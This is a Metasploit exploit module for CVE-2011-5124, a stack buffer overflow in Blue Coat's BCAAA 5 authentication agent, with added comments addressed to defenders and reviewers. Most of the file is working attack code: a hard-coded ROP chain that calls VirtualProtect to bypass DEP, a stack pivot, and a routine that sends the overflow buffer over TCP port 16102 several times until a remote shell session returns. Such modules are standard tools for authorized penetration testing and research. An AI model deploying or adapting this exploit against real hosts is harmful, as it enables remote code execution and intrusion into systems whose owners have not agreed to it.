##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for CVE-2011-5124: a stack buffer overflow in bcaaa-130.exe
# (Blue Coat Authentication and Authorization Agent 5), reached over TCP on
# port 16102 by default (see Opt::RPORT below).
#
# Notes for defenders, taken from the code in this file:
#   * Every attempt opens a fresh TCP connection to RPORT, writes a single
#     buffer (random prefix, ROP chain, encoded payload, pivot) and disconnects
#     after a two-second wait, so a run shows up as between one and ATTEMPTS
#     short connections to the service in quick succession.
#   * All gadget addresses are hard-coded (MSVCR71/MSVCP71/MSVCR70/SmAgentAPI
#     per the inline comments), consistent with the single BCAAA build named
#     in 'Targets'; 'Reliability'/'Stability' are declared UNKNOWN.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  # Registers module metadata, references, payload constraints and options.
  #
  # The payload is limited to 936 bytes and must not contain "\x00"; the only
  # module-specific option is ATTEMPTS (default 3), consumed by #exploit.
  #
  # @param info [Hash] additional module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow",
        'Description' => %q{
          This module exploits a stack buffer overflow in process bcaaa-130.exe (port 16102),
          which comes as part of the Blue Coat Authentication proxy. Please note that by default,
          this exploit will attempt up to three times in order to successfully gain remote code
          execution (in some cases, it takes as many as five times). This can cause your activity
          to look even more suspicious. To modify the number of exploit attempts, set the
          ATTEMPTS option.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Paul Harrington', # Initial discovery and PoC
          'Travis Warren', # MSF Module with Universal DEP/ASLR bypass
          'sinn3r', # More testing / reliability, plus minor changes
        ],
        'References' => [
          [ 'CVE', '2011-5124' ],
          [ 'OSVDB', '72095'],
          [ 'URL', 'https://kb.bluecoat.com/index?page=content&id=SA55' ],
          [ 'URL', 'https://seclists.org/bugtraq/2011/Jul/44' ]
        ],
        'Payload' => {
          'Space' => 936,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          # Single hard-coded target: the gadget addresses in #exploit belong
          # to the DLLs shipped with this build.
          [ 'BCAAA Version 5.4.6.1.54128', {} ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2011-04-04',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(16102),
        # Upper bound on delivery attempts; #exploit stops early once a session exists.
        OptInt.new("ATTEMPTS", [true, "Number of attempts to try to exploit", 3]),
      ]
    )
  end

  # Returns a random 32-bit filler value for the ROP chain and pivot.
  #
  # rand_text(4) is the framework helper for four random bytes; "L" unpacks
  # them as a native-endian unsigned 32-bit integer, and the trailing to_i is
  # a no-op on an Integer. Because this is a method rather than a constant,
  # every `junk` entry in the arrays in #exploit receives its own fresh value;
  # byte order does not matter since the value is only filler.
  #
  # @return [Integer] random value in 0..0xffffffff
  def junk
    return rand_text(4).unpack("L")[0].to_i
  end

  # Builds the overflow buffer and delivers it up to ATTEMPTS times.
  #
  # Buffer layout per attempt (see the concatenation below):
  #   8 random bytes | rop_gadgets | payload.encoded | 'EBAB' | 8 random bytes | pivot
  # rop_gadgets is a mona.py-generated chain (per its comments, it fetches the
  # VirtualProtect pointer and ends in PUSHAD); pivot ends with XCHG EAX,ESP.
  # Both are packed as little-endian 32-bit words ("V*"). The meaning of the
  # fixed 'EBAB' marker is not explained in this file.
  #
  # Each attempt: connect, send the buffer, start the handler, wait two
  # seconds via Kernel#select's timeout, disconnect. session_created? is
  # checked at the top of every iteration, so the first send always happens
  # and later ones are skipped once a session has come back.
  #
  # NOTE(review): disconnect is not inside an ensure block, so an exception
  # raised by connect or sock.put leaves the iteration without an explicit
  # close of the socket.
  def exploit
    rop_gadgets = [
      # rop chain generated with mona.py
      0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
      0x7c37a140, # Make EAX readable
      0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)
      junk, # EBP (filler)
      0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
      0x7c37a140, # <- *&VirtualProtect()
      0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)
      0x7c346c0b, # Slide, so next gadget would write to correct stack location
      0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)
      junk, # EDI (filler)
      junk, # will be patched at runtime (VP), then picked up into ESI
      junk, # EBX (filler)
      0x7c376402, # POP EBP # RETN (msvcr71.dll)
      0x7c345c30, # ptr to 'push esp # ret ' (from MSVCR71.dll)
      0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
      0xfffffdff, # size 0x00000201 -> ebx, modify if needed
      0x7c351e05, # NEG EAX # RETN (MSVCR71.dll)
      0x7c354901, # POP EBX # RETN (MSVCR71.dll)
      0xffffffff, # pop value into ebx
      0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll)
      0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)
      0x7c34d201, # POP ECX # RETN (MSVCR71.dll)
      0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)
      0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll)
      0x7c34b8d8, # ROP NOP (-> edi)
      0x7c344f87, # POP EDX # RETN (MSVCR71.dll)
      0xffffffc0, # value to negate, target value : 0x00000040, target: edx
      0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll)
      0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
      0x90909090, # NOPS (-> eax)
      0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)
    ].pack("V*")

    pivot = [
      0x7C3410C4, # RETN (MSVCR71.dll)
      0x1003800C, # PUSH ESP; POP EBX; POP EBP; RETN (SmAgentAPI.dll)
      0x4241467D, # EBP
      0x7C3C8937, # XCHG EAX,EBP; RETN (MSVCP71.dll)
      0x7C3417D2, # SUB EAX,EAX; RETN (MSVCR71.dll)
      0x7C3C8937, # XCHG EAX,EBP; RETN (MSVCP71.dll)
      0x7C34f6C2, # MOV EAX, EBX; POP EBX; RETN (MSVCR71.dll)
      junk, # EBX
      0x7C3C8937, # XCHG EAX,EBP; RETN (MSVCP71.dll)
      0x5D02D0A0, # SUB EBP,EAX; RETN (MSVCR70.dll)
      0x7C3C8937, # XCHG EAX,EBP; RETN (MSVCP71.dll)
      0x7C3B5080, # XCHG EAX,ESP; RETN (MSVCP71.dll)
    ].pack("V*")

    attempts = datastore['ATTEMPTS']

    # Sometimes a few attempts are needed to get a shell back (3 or 5 times)
    attempts.times do |i|
      # If we have a session on the box already, then we don't continue trying
      break if session_created?

      # Fresh random prefix/suffix per attempt; the ROP chain and pivot are
      # reused from the arrays built above.
      buffer = rand_text(8)
      buffer << rop_gadgets
      buffer << payload.encoded
      buffer << 'EBAB'
      buffer << rand_text(8)
      buffer << pivot

      connect
      print_status("Sending request to #{rhost}. Attempt ##{(i + 1).to_s}...")
      sock.put(buffer)
      handler
      # Kernel#select with no descriptors: a plain 2-second wait for a session
      select(nil, nil, nil, 2)
      disconnect
    end
  end
end